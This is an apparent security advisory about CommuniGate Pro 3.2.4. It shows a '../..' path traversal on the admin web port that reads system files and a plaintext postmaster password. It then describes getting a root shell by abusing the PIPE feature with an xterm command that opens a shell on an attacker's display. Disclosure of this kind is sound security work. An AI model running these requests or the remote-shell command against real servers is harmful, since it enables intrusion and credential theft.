COMMAND
CommuniGate Pro
SYSTEMS AFFECTED
CommuniGate Pro v3.2.4
PROBLEM
Lluis Mora found following. CommuniGate Pro is a feature-full
commercial mail server. It does SMTP message routing, provides
POP, IMAP and HTTP access to mail, etc.
The CommuniGate Pro mail server has a built-in web server that
allows users to read and send e-mail through the web, as well as
allowing the administrator to remotely manage the mail server
settings. By default it opens port 8100/tcp for web users access
to mail and port 8010/tcp for web management access.
1. Reading any file in the mail server
======================================
CommuniGate provides a useful mapping to access the Web User
Guide, which maps the URL /Guide/ to a directory in the
CommuniGate sub tree. The built-in web server suffers of the
well-known "../.." web server problem. If we request a document
from the administrative web server /Guide/ mapping, using the
"../.." technique, we get to see the file contents:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0
HTTP/1.0 200 OK
[... the /etc/motd file content is shown]
Connection closed by foreign host.
homer:~$
As CommuniGate runs as root and it doesn't drop any privileges,
we are able to access any file in the system, e.g. /etc/shadow,...
E.g., we can retrieve the postmaster/manager settings file, which
includes the plaintext password to access the management website:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET
/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.
macnt/account.settings HTTP/1.0
HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT
{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$
2. Remote execution of arbitrary commands as root
=================================================
This is not a vulnerability in itself but a demonstration of what
can be accomplished once an attacker has obtained the postmaster
password.
Looking up the features of CommuniGate, we find the PIPE feature.
It allows people to send e-mail to a program in the mail server.
It's disabled by default, but once we can access the mail server
settings using the postmaster password, we can just enable it,
make the application directory be /usr/X11R6/bin/, increase the
max. process execution time, and send an e-mail to
"xterm -display 172.16.2.4:0 -e /bin/sh"@
pipe which will open a root xterm in our desktop...
This bug has been tested on the Linux (non-redhat & redhat) v3.2.4
(the latest stable release) distribution found at www.stalker.com.
It has not been tested with other platforms or previous versions,
though we strongly believe the bug is platform independent, and
can probably be found and reproduced in previous releases.
SOLUTION
Current beta versions (as from v3.3b2) don't suffer from this
security problem. There is an upcoming stable release (v3.3)
that will fix this problem, and currently the v3.3 betas (v3.3b2
or newer) are patched against this attack. Upgrades are
available from the vendor website.